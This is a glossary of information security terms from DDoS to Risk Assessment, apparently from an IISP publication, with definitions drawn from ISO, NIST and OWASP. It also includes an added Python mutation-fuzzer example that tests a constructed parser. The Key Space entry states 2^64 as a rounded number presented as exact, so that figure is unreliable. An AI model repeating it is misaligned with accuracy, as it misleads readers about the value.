Distributed Denial of Service: DDoS is a type of Denial of Service (DoS) attack in which multiple compromised systems, commonly a botnet of malware-infected machines, are used to target a single system. Attackers also reflect requests off third-party servers with spoofed source addresses so that the amplified replies flood the victim.

Dumpster Diving: A popular form of modern salvaging of waste in large commercial, residential, industrial and construction containers to find items that have been discarded by their owners but that may prove useful to the picker. In information security terms this means an attacker could retrieve sensitive information, including personal data, which could allow the attacker to launch a social engineering attack on an individual.

Eavesdropping Attack: Any attack on a data connection where one simply records or views data instead of tampering with the connection. (Source: OWASP)

Encryption: The process of transforming plaintext into ciphertext for the purpose of security or privacy. (Source: NIST SP 800-175A)

Endpoint Protection: Provides a collection of security utilities to protect PCs, laptops, tablets and other end-user devices. Products usually combine application control, device control, port control, anti-malware, a host firewall and web filtering, and some add host intrusion prevention and disk encryption management.

Enterprise Security Architecture: Also referred to as Enterprise Information Security Architecture (EISA). This is the part of enterprise architecture focusing on information security throughout the enterprise. It is the application of comprehensive and rigorous methods for describing a current or future structure and behaviour for an organisation's security processes, information security systems, personnel and organisation. Two frameworks of note are TOGAF and SABSA.

Entropy: Refers to the inherent unknowability of data to external observers. If a bit is just as likely to be a 1 as a 0 and an observer does not know which it is, then the bit contains one bit of entropy. A random number generator must gather enough entropy before its output is fit for keys, and a value that merely looks random to a human but is drawn from a small set of choices has very little of it. (Source: OWASP)

Evaluation Assurance Level: Set of assurance requirements drawn from ISO/IEC 15408-3, representing a point on the ISO/IEC 15408 predefined assurance scale (EAL1 to EAL7), that form an assurance package. (Source: ISO/IEC 15408)

Fail Securely: A security design principle: when a component fails or an error is raised, the system should deny access and disclose nothing rather than grant access by default, so an exception inside an authorisation check must result in denial. See Failsafe.

Failsafe: Concept used mainly in safety-critical or high-security system and process designs, whereby a control failure leaves the system/process in an inherently safe or secure condition, even if that impairs availability. "Safe" and "secure" can pull in opposite directions: an electronic door lock that fails safe unlocks on power loss so that people can leave, whereas one that fails secure stays locked, and the design must state which is wanted.

False Negative: A test result which wrongly indicates that a particular condition or attribute is absent. (Source: Oxford English Dictionary)
False Positive: A test result which wrongly indicates that a particular condition or attribute is present. (Source: Oxford English Dictionary)

Fault Tolerance: A capability of a system or network to deliver uninterrupted service despite one or more of its components failing. The purpose is to prevent the catastrophic failure that could result from a single point of failure.

Federated Identity: Identity for use in multiple domains, which together form an identity federation. (Source: ISO/IEC 24760-1:2011)
NOTE 1 A federated identity may be jointly managed by identity information providers of the federated domains.
NOTE 2 The shared attributes used in the federated domains may in particular be used for identification, e.g. to support single sign-on (SSO).
NOTE 3 The federated identity may persist or may be a temporary one, e.g. as a single sign-on identity.
Full Disk Encryption: The encryption of all data on a disk drive, including the bootable operating system partition. It is performed by disk encryption software or by hardware installed in the drive during manufacture, or via an additional software driver. It converts all device data into a form that can be understood only by whoever holds the key to decrypt it. FDE protects data at rest only: once the device has booted and been unlocked, the operating system reads the disk in plaintext, so it offers no protection against malware or an attacker with a logged-in session. Access to the key is gated by pre-boot authentication or by binding the key to the hardware (for example sealing it to a TPM), and a small unencrypted boot loader must remain to perform that step.

Functional Testing: A software testing process used within software development in which software is tested to ensure that it conforms to all requirements.

Fuzzing: Fuzz testing, or fuzzing, is an automated software testing technique that finds implementation bugs by feeding a program malformed or semi-malformed inputs and watching for crashes, hangs or assertion failures. OWASP describes it as a black-box technique; modern coverage-guided fuzzers instrument the target so that inputs reaching new code are kept as seeds, which makes the search far more effective than blind mutation. (Source: OWASP)
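The following added example (not from the IISP text or OWASP) is a small mutation fuzzer run against a constructed binary-record parser. The record format (type, length, payload, XOR checksum) and both parsers are hypothetical: the buggy one trusts the sender-declared length and raises an unexpected `IndexError`, which the fuzzer reports as a crash; the fixed one validates the length first. The fuzzer treats `ValueError` as the parser's documented rejection and anything else as a bug, and keeps accepted inputs as new seeds.

```python
"""A mutation fuzzer finding a crash in a small binary-record parser.

Added example, not from the IISP text or OWASP. The record format
(type, length, payload, XOR checksum) and both parsers are constructed for
the demo; the buggy one trusts the declared length, the fixed one checks it.
"""
import random
from typing import Callable, List, Tuple


def parse_record_buggy(data: bytes) -> Tuple[int, bytes]:
    """Record = type(1) | length(1) | payload(length) | xor-checksum(1).
    Bug: the declared length is never checked against the buffer, so a truncated or
    length-inflated record raises IndexError instead of the documented ValueError."""
    if len(data) < 3:
        raise ValueError("too short")
    rtype, length = data[0], data[1]
    payload = data[2:2 + length]
    check = 0
    for b in payload:
        check ^= b
    if check != data[2 + length]:           # IndexError when 2 + length >= len(data)
        raise ValueError("bad checksum")
    return rtype, payload


def parse_record_fixed(data: bytes) -> Tuple[int, bytes]:
    if len(data) < 3:
        raise ValueError("too short")
    rtype, length = data[0], data[1]
    if len(data) != 3 + length:             # validate the untrusted length before using it
        raise ValueError("length field does not match buffer")
    payload = data[2:2 + length]
    check = 0
    for b in payload:
        check ^= b
    if check != data[2 + length]:
        raise ValueError("bad checksum")
    return rtype, payload


def mutate(rng: random.Random, seed: bytes) -> bytes:
    """One random edit: overwrite a byte, flip a bit, truncate, or insert a byte."""
    data = bytearray(seed)
    op = rng.randrange(4)
    if op == 0 and data:
        data[rng.randrange(len(data))] = rng.randrange(256)
    elif op == 1 and data:
        data[rng.randrange(len(data))] ^= 1 << rng.randrange(8)
    elif op == 2 and len(data) > 1:
        del data[rng.randrange(len(data)):]
    else:
        data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    return bytes(data)


def fuzz(target: Callable[[bytes], object], seed: bytes,
         iterations: int = 2000, rng_seed: int = 1) -> List[Tuple[bytes, str]]:
    """Feed mutated inputs to target; a ValueError is the parser's documented rejection,
    any other exception is a bug. Inputs the parser accepts join the corpus as new seeds."""
    rng = random.Random(rng_seed)   # fixed seed so a run is reproducible
    corpus = [seed]
    crashes = []
    for _ in range(iterations):
        case = mutate(rng, rng.choice(corpus))
        try:
            target(case)
        except ValueError:
            continue
        except Exception as exc:
            crashes.append((case, f"{type(exc).__name__}: {exc}"))
        else:
            corpus.append(case)
    return crashes


# Constructed valid seed: type 1, length 3, payload b"abc", checksum 0x61 ^ 0x62 ^ 0x63 = 0x60
SEED = b"\x01\x03abc\x60"
```

Every crashing input the buggy parser produces has a declared length that reaches past the end of the buffer; the same run against `parse_record_fixed` reports nothing, because the only exception it can raise is the documented one.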
General Data Protection Regulation: The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a Regulation by which the European Parliament, the Council and the European Commission intend to strengthen and unify data protection for individuals within the European Union. It was adopted in April 2016, applies from 25 May 2018 and replaces Directive 95/46/EC; unlike a directive, a regulation applies directly in every member state without national implementing legislation.

Governance: The system by which an organisation's information security activities are directed and controlled. (Source: ISO/IEC 27000:2016)

Governing Body: Person or group of people who are accountable for the performance and conformance of the organisation. (Source: ISO/IEC 27000:2016)

Gramm-Leach-Bliley Act: This US federal Act is also known as the Financial Modernization Act of 1999. The Act includes provisions to protect consumers' personal financial information held by financial institutions.

Guideline: A general rule, principle or piece of advice. (Source: Oxford English Dictionary)

Hardening: Elimination of as many security risks as possible on an application, device or operating system. This is typically done by removing all non-essential services, software and utilities to reduce the attack surface, closing unused ports, applying patches, and removing or disabling default user accounts and changing every default password.

Hash Function: See Cryptographic Hash Function. (Source: NIST SP 800-175B)

Hash Value: The result of appl ying a hash function to information; also called a message digest. (Source: NIST SP 800-175B)

Heuristics: Proceeding to a solution by trial and error or by rules that are only loosely defined. (Source: Oxford English Dictionary)

Honey Pot: A strategy of setting up resources which an attacker believes are real but which are in fact designed specifically to catch the attacker. (Source: OWASP)

Host Intrusion Detection System: HIDS. These products attempt to identify unauthorised, illicit and anomalous behaviour on a specific device, whether it is a server or a workstation. A HIDS generally involves an agent installed on each system, monitoring and alerting on local OS and application activity. The installed agent uses a combination of signatures, rules and heuristics to identify unauthorised activity. Like a NIDS, the role of a HIDS is passive: it only gathers, identifies, logs and alerts.

Host Intrusion Prevention System: HIPS. Similar to a HIDS except that it can be configured to block activity. Most products in this space can operate in either HIDS or HIPS mode, usually on a rule-by-rule basis.

HTTP: HTTP (Hypertext Transfer Protocol) is the application-layer protocol for transferring resources (text, graphic images, sound, video and other files) on the World Wide Web. HTTP runs on top of the TCP/IP suite of protocols and carries its traffic in plaintext; confidentiality and integrity on the wire require HTTPS.
HTTPS: HTTPS (HTTP over TLS, or HTTP Secure) is the use of Transport Layer Security (TLS), or historically its predecessor Secure Sockets Layer (SSL), to carry HTTP application traffic. SSL 2.0 and SSL 3.0 are deprecated (RFC 6176 and RFC 7568) and should not be enabled; a modern deployment offers TLS 1.2 or later with a reviewed set of cipher suites (see Cipher Suite).

Human Factors: Human factors and ergonomics is the practice of designing products, systems or processes to take proper account of the interaction between them and the people who use them.

Human Rights Act: The Human Rights Act 1998 is a UK Act of Parliament. Its aim is to incorporate into UK law the rights contained in the European Convention on Human Rights.

Hybrid Cloud: The cloud infrastructure is a composition of two or more distinct cloud infrastructures (private, community or public) that remain unique entities but are bound together by standardised or proprietary technology that enables data and application portability (e.g. cloud bursting for load balancing between clouds). (Source: NIST SP 800-145)

IAMM: Information Assurance Maturity Model and Assessment Framework. A tool used by the UK Government to assess the effectiveness of the implementation of the Security Policy Framework (SPF). Although an independent IAMM audit is not mandated, each UK Government Department is required to deliver a report on the state of the SPF controls in its annual statement on internal control. This report must include details of how supply chain partners are meeting IA best practice.

Identification: Process of recognising an entity in a particular domain as distinct from other entities. (Source: ISO/IEC 24760-1:2011)
NOTE 1 The process of identification applies verification to claimed or observed attributes.
NOTE 2 Identification typically is part of the interactions between an entity and the services in a domain and to access resources. Identification may occur multiple times while the entity is known in the domain.
Identity Management: Processes and policies involved in managing the lifecycle and value, type and optional metadata of attributes in identities known in a particular domain. (Source: ISO/IEC 24760-1:2011)
NOTE 1 In general identity management is involved in interactions between parties where identity information is processed.
NOTE 2 Processes and policies in identity management support the functions of an identity information authority where applicable, in particular to handle the interaction between an entity for which an identity is managed and the identity information authority.
Information Security: Preservation of confidentiality, integrity and availability of information. (Source: ISO/IEC 27000:2016)
Intrusion Detection System: Technical system that is used to identify that an intrusion has been attempted, is occurring or has occurred, and possibly to respond to intrusions in information systems and networks. (Source: ISO/IEC 27033-1:2009)

Intrusion Prevention System: Variant on intrusion detection systems that is specifically designed to provide an active response capability. (Source: ISO/IEC 27033-1:2009)

Investigatory Powers Act: The Investigatory Powers Act 2016 is an Act of the Parliament of the United Kingdom and provides a framework to govern the use and oversight of investigatory powers by law enforcement and the security and intelligence agencies in the UK.

Investigatory Powers Commission: The Investigatory Powers Commission ensures that the public and Parliament are informed about how the powers laid out in the Investigatory Powers Act are used. The Investigatory Powers Commissioner reports annually and has the power to report more frequently on any matter they consider appropriate.

IoT Security Foundation: The IoT Security Foundation (IoTSF). A non-profit organisation dedicated to driving security excellence. Its mission is to help secure the Internet of Things, in order to aid its adoption and maximise its benefits.

IP Address: An identifier for a computer or device on a TCP/IP network, such as the Internet; IPv4 addresses are 32 bits long (written in dotted decimal) and IPv6 addresses 128 bits. Networks using the TCP/IP protocol route messages based on the IP address of the destination. The source address is written by the sender and is not authenticated, so it can be spoofed and should not be relied on by itself for access control.

IP Packet: A unit of data sent from one host to another over an IP network. The packet header carries the source and destination IP addresses, the total length, the protocol of the encapsulated payload (e.g. TCP or UDP), a time-to-live, a header checksum and other fields that help the packet reach its destination and be read, followed by the payload itself. Routers forward the packet on its destination address and decrement the time-to-live at each hop.
IPsec A set of protocols that provides security for Internet Protocol.
IRAM2 Information Risk Analysis Methodology 2 (IRAM2) produced by the
Information Security Forum (ISF). ISF have also produced an
associated Risk Management Tool.
ISO/IEC 15408 ISO/IEC 15408. A three part standard.
ISO/IEC 15408-1:2009. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 1: Introduction
and general model.
ISO/IEC 15408-2:2008. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 2: Security
functional components.
ISO/IEC 15408-3:2008. Information technology -- Security
techniques -- Evaluation criteria for IT security -- Part 3: Security
assurance components
ISO/IEC 21827 ISO/IEC 21827:2008. Information technology -- Security techniques -
- Systems Security Engineering -- Capability Maturity Model® (SSE-
CMM®).
ISO 22301 ISO 22301:2012. Societal security -- Business continuity
management systems --- Requirements.
ISO 22313 ISO 22313:2012. Societal security -- Business continuity
management systems – Guidance.
ISO/IEC 24760 ISO/IEC 24760-1:2011 Information technology -- Security techniques
-- A framework for identity management -- Part 1: Terminology and
concepts.
ISO/IEC 27000 ISO/IEC 27000:2016. Information technology — Security techniques
— Information security management systems — Overview and
vocabulary. Part of the ISO/IEC 27000 family of standards.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
ISO/IEC 27000 family: The ISO/IEC 27000 family of mutually supporting information security standards (also known as the ISO 27000 series) is developed and published by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) to provide a globally recognised framework for best-practice information security management.
ISO 27001 Lead Auditor: The ISO/IEC 27001 Lead Auditor certification is a professional certification for auditors specialising in information security management systems (ISMS).
ISO/IEC 27001: ISO/IEC 27001:2013. Information technology -- Security techniques -- Information security management systems -- Requirements. Part of the ISO/IEC 27000 family of standards.
ISO/IEC 27002: ISO/IEC 27002:2013. Information technology -- Security techniques -- Code of practice for information security controls. Part of the ISO/IEC 27000 family of standards.
ISO/IEC 27005: ISO/IEC 27005:2011. Information technology -- Security techniques -- Information security risk management. Part of the ISO/IEC 27000 family of standards.
ISO/IEC 27006: ISO/IEC 27006:2015. Information technology -- Security techniques -- Requirements for bodies providing audit and certification of information security management systems.
ISO/IEC 27014: ISO/IEC 27014:2013. Information technology -- Security techniques -- Governance of information security. Part of the ISO/IEC 27000 family of standards.
ISO/IEC 27033-1: ISO/IEC 27033-1:2009. Information technology -- Security techniques -- Network security -- Part 1: Overview and concepts.
ISO/IEC 27035: ISO/IEC 27035-1:2016. Information technology -- Security techniques -- Information security incident management -- Part 1: Principles of incident management.
ISO/IEC 27035-2:2016. Information technology -- Security techniques -- Information security incident management -- Part 2: Guidelines to plan and prepare for incident response.
ISO 31000: ISO 31000:2009. Risk management -- Principles and guidelines.
ISO 9000: ISO 9000:2015. Quality management systems -- Fundamentals and vocabulary.
ISO Guide 73: Risk management -- Vocabulary. First edition 2009.
ITIL: A set of detailed practices for IT service management (ITSM). It describes processes, procedures, tasks, and checklists for different stages in the ITSM lifecycle. Formally an acronym for Information Technology Infrastructure Library.
Kali Linux: Kali Linux is an open source Debian-derived Linux distribution designed for digital forensics and penetration testing. Kali Linux is preinstalled with over 300 penetration-testing programs.
Key: A random piece of data used with encryption and decryption. Encryption and decryption algorithms require a key and plaintext or ciphertext to produce ciphertext or plaintext, respectively. Keys are usually very large randomly generated numbers.
Key Distribution: The mechanism used to deliver cryptographic keys to the required parties.
Key Exchange: The process of two parties agreeing on a shared secret, usually implying that both parties contribute to the key. (Source: OWASP)
Key Management: The activities involving the handling of cryptographic keys and other related security parameters during the entire life cycle of the keys, including the generation, storage, establishment, entry and output, and destruction.
Key Pair: A pair of cryptographic keys consisting of a public key and a private key associated with an asymmetric cipher. They have a mathematical relationship with each other.
Key Size: The size of a cryptographic key. Usually specified in bits.
Key Space: All possible values used to construct cryptographic keys. The larger the key space the better. In the case of a 64-bit key, the key space is 2 to the power of 64 (2^64). In other words, the number of possible values of the key, i.e. the key space, is 18,446,744,073,709,600,000.
Least Privilege: All processes should run with the minimal possible set of privileges and should retain those privileges for the minimal amount of time possible.
Legislation: Laws, considered collectively. (Source: Oxford English Dictionary)
Level of Risk: Magnitude of a risk expressed in terms of the combination of consequences and their likelihood.
Lightweight Directory Access Protocol: LDAP is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network.
Likelihood: Chance of something happening. (Source: ISO/IEC 27005:2011)
Mail Filtering: Inspection of incoming email and removal of spam and computer viruses using antivirus software. A less common use is to inspect outgoing email and enforce some type of Data Loss Prevention policy.
Malware: Software which is specifically designed to disrupt, damage, or gain unauthorized access to a computer system. (Source: Oxford English Dictionary)
Mandatory Access Control: A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity. (Source: NISTIR 7298)
Man-in-the-middle Attack: An eavesdropping attack where a client’s communication with a server is proxied by an attacker. Generally, the implication is that the client performs a cryptographic key exchange with an entity and fails to authenticate that entity, thus allowing an attacker to look like a valid server. (Source: OWASP)
Message Digest: See Hash Value. (Source: NIST SP 800-175B)
Methodology: A system of methods used in a particular area of study or activity. (Source: Oxford English Dictionary)
MIME: Multipurpose Internet Mail Extensions is an Internet standard that extends the format of email to support:
• Text in character sets other than ASCII.
• Non-text attachments: audio, video, images, application programs etc.
• Message bodies with multiple parts.
Minimisation: Do not execute any software, applications, or services that are not required. Do not install any software you are not using. A security design principle.
Mitigation: The action of reducing the severity, seriousness, or painfulness of something. (Source: Oxford English Dictionary)
Multifactor Authentication: Authentication using two or more factors to achieve authentication. Factors include: (i) something you know (e.g. password/PIN); (ii) something you have (e.g., cryptographic identification device, token); and (iii) something you are (e.g., biometric). (Source: NISTIR 7298)
Mutual Authentication: A process or technology in which both entities in a communications link authenticate each other. In a network environment, the client authenticates the server and vice-versa. Also called two-way authentication.
National Cyber Security Centre: The National Cyber Security Centre (NCSC) is the UK’s authority on cyber security. It is part of GCHQ. The NCSC brings together and replaces CESG (the information security arm of GCHQ), the Centre for Cyber Assessment (CCA), Computer Emergency Response Team UK (CERT UK) and the cyber-related responsibilities of the Centre for the Protection of National Infrastructure (CPNI).
National Institute of Standards and Technology: The National Institute of Standards and Technology (NIST) is a division of the U.S. Department of Commerce. NIST issues standards and guidelines, with the hope that they will be adopted by the computing community. (Source: OWASP)
National Vulnerability Database: The National Vulnerability Database (NVD) is a U.S. government repository of standards-based vulnerability management data.
Need-To-Know: A method of isolating information resources based on a user’s need to have access to that resource in order to perform their job but no more. The terms “need-to-know” and “least privilege” express the same idea. Need-to-know is generally applied to people, while least privilege is generally applied to processes. (Source: NISTIR 7298)
Negative Test: Checks if a function/method behaves as expected with bad input and can correctly handle error conditions.
Network Intrusion Detection System: NIDS. These products attempt to identify unauthorised, illicit, and anomalous behaviour based solely on network traffic as the traffic traverses a NIDS sensor. A NIDS, using either a network tap, span port, or hub, collects IP packets that traverse a given network. Using the captured data, the NIDS system processes and flags, and optionally reports or alerts on, any suspicious traffic. The role of a NIDS is passive, only gathering, identifying, logging and alerting.
Network Intrusion Prevention System: NIPS. Very similar to a NIDS except this device actually blocks any traffic it believes to be suspicious. Most network products of this type can be configured to operate in either NIDS or NIPS mode.
Network Operation Centre: A NOC, also known as a "network management centre", is one or more locations from which network monitoring and control, or network management, is exercised over a network.
Network Router: Network device that is used to establish and control the flow of data between different networks by selecting paths or routes based upon routing protocol mechanisms and algorithms. (Source: ISO/IEC 27033-1:2009)
Network Switch: Device which provides connectivity between networked devices by means of internal switching mechanisms, with the switching technology typically implemented at layer 2 or layer 3 of the OSI reference model. (Source: ISO/IEC 27033-1:2009)
NIST SP 500-292: NIST Special Publication 500-292. NIST Cloud Computing Reference Architecture (September 2011).
NIST SP 800-175A: NIST Special Publication 800-175A. Guideline for Using Cryptographic Standards in the Federal Government: Directives, Mandates and Policies (August 2016).
NIST SP 800-145: NIST Special Publication 800-145. The NIST Definition of Cloud Computing (September 2011).
NIST SP 800-146: NIST Special Publication 800-146. Cloud Computing Synopsis and Recommendations (May 2012).
NIST SP 800-175B: NIST Special Publication 800-175B. Guideline for Using Cryptographic Standards in the Federal Government: Cryptographic Mechanisms (August 2016).
NIST SP 800-30: NIST Special Publication 800-30. Guide for Conducting Risk Assessments (September 2012).
NISTIR 7298: NIST Internal/Interagency Reports (NISTIR) 7298 revision 2. Glossary of Key Information Security Terms (May 2013) (http://nvlpubs.nist.gov/nistpubs/ir/2013/NIST.IR.7298r2.pdf).
Non-repudiation: Ability to prove the occurrence of a claimed event or action and its originating entities. (Source: ISO/IEC 27000:2016)
OASIS: The Organization for the Advancement of Structured Information Standards (OASIS) is a global non-profit consortium that works on the development, convergence, and adoption of standards for security, Internet of Things, energy, content technologies, emergency management, and other areas.
Obfuscate: Make obscure, unclear, or unintelligible. (Source: Oxford English Dictionary)
Some malware hides its code in this way to make it harder for security software to detect or remove it.
Object: A piece of data or a resource.
OCTAVE: OCTAVE Allegro is a risk management methodology to streamline and optimise the process of assessing information security risks so that an organisation can obtain sufficient results with a small investment in time, people, and other limited resources. Developed by the Software Engineering Institute (SEI) within Carnegie Mellon University.
O-ESA: Open Enterprise Security Architecture (O-ESA). O-ESA introduces the notion of design patterns with the explanation of a number of conceptual and logical security architectures for particular areas of an IT system. It also describes a number of security services.
Open Source Intelligence: Open Source Intelligence (OSINT) is intelligence created from public or open source information, including that published in the media, or legislation, annual reports, or directories, or available from conferences, theses, studies, websites, photographic satellites, or maps, among others.
OWASP: The Open Web Application Security Project (OWASP). A not-for-profit charitable international organisation that publishes freely-available articles, methodologies, standards documentation, tools, and technologies in the field of web application security.
OWASP Top 10: OWASP publish a number of “Top Ten” lists. The most famous, and what most people mean by the “Top Ten”, is the OWASP Top 10 Most Critical Web Application Security Risks, which lists what its members consider to be the ten most critical web application security flaws.
Packet Filtering: Passing or blocking packets at a network interface based on source and destination IP addresses, ports, or protocols.
PAS 754: PAS 754:2014. Software Trustworthiness. Governance and management. Specification.
A PAS (Publicly Available Specification) from BSI which identifies five aspects of software trustworthiness: safety, reliability, availability, resilience and security. It defines a set of principles and techniques for any software implementation. Currently undergoing BSI standardisation work.
Passphrase: A synonym for “password,” meant to encourage people to use longer (it is hoped, more secure) values. (Source: OWASP)
Password: A secret string of characters that should only be known by one person and can therefore be used to authenticate them.
Password Aging: A mechanism used to force a user to change their password after a defined period of time.
Password Complexity: A scheme where special characters, numbers, and a mix of lower and upper case characters are used in a password in order to prevent brute force attacks.
Password File: A file or database containing user or other subjects’ passwords. They are normally held in a hashed form.
Password Guessing Attack: An attempt to determine user credentials through the process of attempting to log in repeatedly. This is generally done by using commonly used or default passwords—attempting every possible combination until successful.
Password Reset: A facility that allows a user, an administrator or a helpdesk operator to reset a user’s password to a desired new value, regardless of its current value.
Password Strength: A measure of the effectiveness of a password in resisting guessing and brute-force attacks. The strength of a password is a function of length, complexity, and unpredictability.
Patch Management: An area of systems management that involves acquiring, testing, and installing multiple patches (code changes) to an administered computer system. Patch management tasks include: maintaining current knowledge of available patches, deciding what patches are appropriate for particular systems, ensuring that patches are installed properly, testing systems after installation, and documenting all associated procedures, such as specific configurations required.
PCI DSS: The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organisations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands and administered by the Payment Card Industry Security Standards Council. The standard defines the security controls needed to protect cardholder data and hence aims to reduce credit card fraud.
Penetration Testing: A simulated attack whereby the penetration tester uses tools of the hacking trade to attempt to break into a system, network, device or application.
Permission: An approval for a subject to perform an operation on one or more protected objects. The set of operations supported depends on the access control model and can include: read, write, delete, execute and search.
Personal Data: “Personal data” means data which relate to a living individual who can be identified— (Source: Data Protection Act)
(a) from those data, or
(b) from those data and other information which is in the possession of, or is likely to come into the possession of, the data controller,
and includes any expression of opinion about the individual and any indication of the intentions of the data controller or any other person in respect of the individual;
Personal Identification Number: A numeric password used on systems with numeric keypads instead of full alphanumeric keyboards. PIN is often misused as a synonym for password.
Personnel Security Controls: The controls and procedures that are established to ensure that all personnel who have access to sensitive information have the required authority as well as appropriate clearances. Procedures confirm a person’s background and provide assurance of necessary trustworthiness.
Pharming: A malicious website that resembles a legitimate website, used to gather usernames and passwords.
Phishing: A malicious technique used to gather sensitive information (credit card data, usernames and passwords, etc.) from users. The attackers pretend to be a trustworthy entity to bait the victims into trusting them and revealing their confidential data.
Physical Security Controls: Controls and procedures put into place to prevent intruders from physically accessing a system or facility. The controls enforce access control and authorised access.
Plaintext: Intelligible data that has meaning and can be understood without the application of cryptography. (Source: NIST SP 800-175A)
Platform as a Service: The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment. (Source: NIST SP 800-145)
Policy: Intentions and direction of an organization as formally expressed by its top management. (Source: ISO/IEC 27000:2016)
Polymorphic Malware: Polymorphic malware is harmful, destructive or intrusive computer software such as a virus, worm, trojan or spyware that constantly changes ("morphs"), making it difficult to detect with anti-malware programs.
Port Control: Protects against data loss by monitoring and controlling access to device ports on a user workstation.
Port Scanning: Using a program to remotely determine which ports on a system are open (e.g., whether systems allow connections through those ports). (Source: NISTIR 7298)
Positive Test: Checks if a function/method behaves as expected with its expected input.
Predict, Prevent, Detect, Respond: Predict, Prevent, Detect, Respond (PPDR) is a framework published by the analysts Gartner. It is a useful tool to communicate an organisation’s strategy and approach to security.
Pre-production: An environment for final testing immediately prior to deploying to production. It seeks to mirror the actual production environment as closely as possible, and may connect to other production services and data, such as databases.
Pretty Good Privacy: An encryption program that provides confidentiality and authentication for data communication. PGP is often used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
Preventive Control: A security control designed to prevent an information security incident from occurring.
Primary Account Number: Primary Account Number (PAN), also referred to as “account number.” Unique payment card number (typically for credit or debit cards) that identifies the issuer and the particular cardholder account. (Source: PCI DSS)
Privacy: Informational privacy is the ability of a person to control, edit, manage and delete information about themselves and to decide how and to what extent such information is communicated to others. Intrusion can come in the form of collection of excessive personal information, disclosure of personal information without consent and misuse of such information. It can include the collection of information through the surveillance or monitoring of how people act in public or private spaces and through the monitoring of communications whether by post, phone or online, and extends to monitoring the records of senders and recipients as well as the content of messages.
Privacy and Electronic Communications Regulations: The Privacy and Electronic Communications (EC Directive) Regulations 2003 (PECR) is a law in the UK which makes it unlawful to, amongst other things, transmit an automated recorded message for direct marketing purposes via a telephone, without prior consent of the subscriber. It also covers the use of cookies. It implements an EC directive and has been amended a number of times.
Privacy Impact Assessment: Also known as a Data Protection Impact Assessment.
Private Cloud: The cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises. (Source: NIST SP 800-145)
Private Key: Key of an asymmetric key pair which can only be used by the owner of that key. Hence it must be kept secret.
Privilege: An identified right that a particular user has to a particular system resource, such as a file folder, the use of certain system commands, or an amount of storage.
Privilege Elevation: A vulnerability that lets a hacker elevate their privilege and hence do things on a PC, network or server that they otherwise wouldn't be able to. This occurs when an unprivileged user gains privileged status.
Procedural Security Controls: Security controls that mitigate identified risks by way of policies, procedures or guidelines. As opposed to other controls, procedural controls rely on users to follow rules or perform certain steps that are not necessarily enforced by technical or physical means. Also known as administrative controls.
Procedure: Specified way to carry out an activity or a process. (Source: ISO 9000:2015)
Process: Set of interrelated or interacting activities which transforms inputs into outputs. (Source: ISO 9000:2015)
Protection Profile: Implementation-independent statement of security needs for a TOE type. (Source: ISO/IEC 15408)
Protective Monitoring: A set of processes and technologies aimed at improving risk profiles and reducing risk. Protective Monitoring provides essential oversight of IT systems across the whole enterprise. Protective Monitoring includes efficient, automatic monitoring, alerting and reporting of system changes, significant system events and file integrity monitoring. In order to implement protective monitoring, investment in a SIEM product is usually required.
Proxy Server: A server that services the requests of its clients by forwarding those requests to other servers. (Source: NISTIR 7298)
Ransomware: Malware that restricts access to the compromised systems until a ransom demand is satisfied. You may be warned that you need to pay money, complete surveys, or perform other actions before you can use your PC again. Some forms of ransomware may encrypt files on the system's hard drive, while others may simply lock the system and display messages to coax the user into paying.
Some types of ransomware also prevent restoration of data from incremental backups by deleting or corrupting the checkpoint data.
Regulation: A rule or directive made and maintained by an authority. (Source: Oxford English Dictionary)
Regulation of Investigatory Powers Act: The Regulation of Investigatory Powers Act 2000 (RIPA) is an Act of the Parliament of the UK, regulating the powers of public bodies to carry out surveillance and investigation, and covering the interception of communications.
Release Management: The process of managing, planning, scheduling and controlling a software build through different stages and environments, including testing and deploying software releases.
Reliability: Property of consistent intended behaviour and results. (Source: ISO/IEC 27000:2016)
Remediation Action Plan: A plan of actions on how risks, usually found during a vulnerability assessment or penetration test, are to be addressed. Also known as a Risk Treatment Plan (RTP).
Remote Access: Process of accessing network resources from another network, or from a terminal device which is not permanently connected, physically or logically, to the network it is accessing. (Source: ISO/IEC 27033-1:2009)
Reputation: The beliefs or opinions that are generally held about someone or something. (Source: Oxford English Dictionary)
Residual Risk: Risk remaining after risk treatment. (Source: ISO/IEC 27000:2016)
Retention Schedule: A document listing the titles of each document or record that will be retained as an active record, the period of retention, when the retention period starts and the reason for its retention (administrative, legal, fiscal, and historical). A clearly defined plan for record retention and disposal is a vital component of a records management program.
Review, Retention and Disposal: A Review, Retention and Disposal (RRD) policy defines what an organisation should do in terms of retaining or disposing of (i.e. destroying) information, including personal data. This is in order to be compliant with various legislation in terms of retaining information (e.g. Companies Act for finance and accounting records) and not retaining personal data for longer than necessary, to be compliant with principle 5 of the Data Protection Act.
The implementation of this policy is usually expressed with a retention schedule.
Risk: Effect of uncertainty on objectives. (Source: ISO/IEC 27000:2016)
Risk Acceptance: Informed decision to take a particular risk. (Source: ISO/IEC 27000:2016)
Risk Analysis: Process to comprehend the nature of risk and to determine the level of risk. (Source: ISO/IEC 27005:2011)
Risk Appetite: Amount and type of risk that an organization is willing to pursue or retain. (Source: ISO Guide 73:2009)
Risk Assessment: The overall process of risk identification, risk analysis and risk evaluation. (Source: ISO/IEC 27005:2011)
